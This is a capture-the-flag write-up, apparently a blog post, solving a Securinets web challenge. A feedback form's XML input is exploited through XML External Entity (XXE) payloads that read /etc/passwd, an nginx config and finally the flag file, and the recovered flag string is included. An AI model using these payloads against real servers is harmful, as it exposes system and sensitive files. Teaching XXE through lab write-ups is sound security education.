Description

I created this website to get your feedback on our CTF. Can you check if it’s secure ?
Link
Ps: flag stored in “flag” file

Author:Tr’GFx

Write-Up

We are given a link to a webpage with a form with three fields: Full name, E-mail and Feedback.

After we fill the form with the data we want to submit, we hit the send button and the webpage responds thanking us for our contribution.

The fact that the response includes the name that we indicated previously tell us that our request has been read or parsed in some way.

Let’s set up our proxy and open Burp Suite so we can analyse the requests and responses in depth.

<?xml version="1.0" encoding="UTF-8"?>
<feedback>
	<author>Hackiit</author>
	<email>hackiit@hackiit.org</email>
	<content>Hackiit rules</content>
</feedback>

As we see, the data we submited is sent to the webserver using an XML document.

The application parses the XML documents and builds the response with the data tagged as author. We could try to exploit a common vulnerability in this kind of applications called XML External Entity (XXE) Processing.

This is possible due to poorly configured XML parsers that process references to external entities leading up to the disclosure of local files that could potentially contain sensitive data such as passwords, personal information or even flags…

To prove that the vulnerability exists, we try to retrieve a file that we know for sure that is on the server, for example /etc/passwd. The XML template should look something like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <feedback>
       <author>&xxe;</author>
       <email>anything</email>
       <content>anything</content>
    </feedback>

Note that the elements that we send in this request are the same as the ones we found initially (author, email, content).

Since we referenced /etc/passwd as an XML Entity inside the author field, the file shows as part of the “thank you” message, making the content visible for us.

We should now look for information-rich files to find out what is the root directory for the webserver, which we know is Nginx, because maybe the flag is stored there. We check the configuration file /etc/nginx/sites-available/default

We can see at the bottom that the root directory is /var/www/html/epreuve, so we just retrieve the file /var/www/html/epreuve/flag and we get the flag.

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///var/www/html/epreuve/flag" >]>
    <feedback>
       <author>&xxe;</author>
       <email>something</email>
       <content>something</content>
    </feedback>

Securinets{Xxe_xXE_@Ll_Th3_W@Y}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *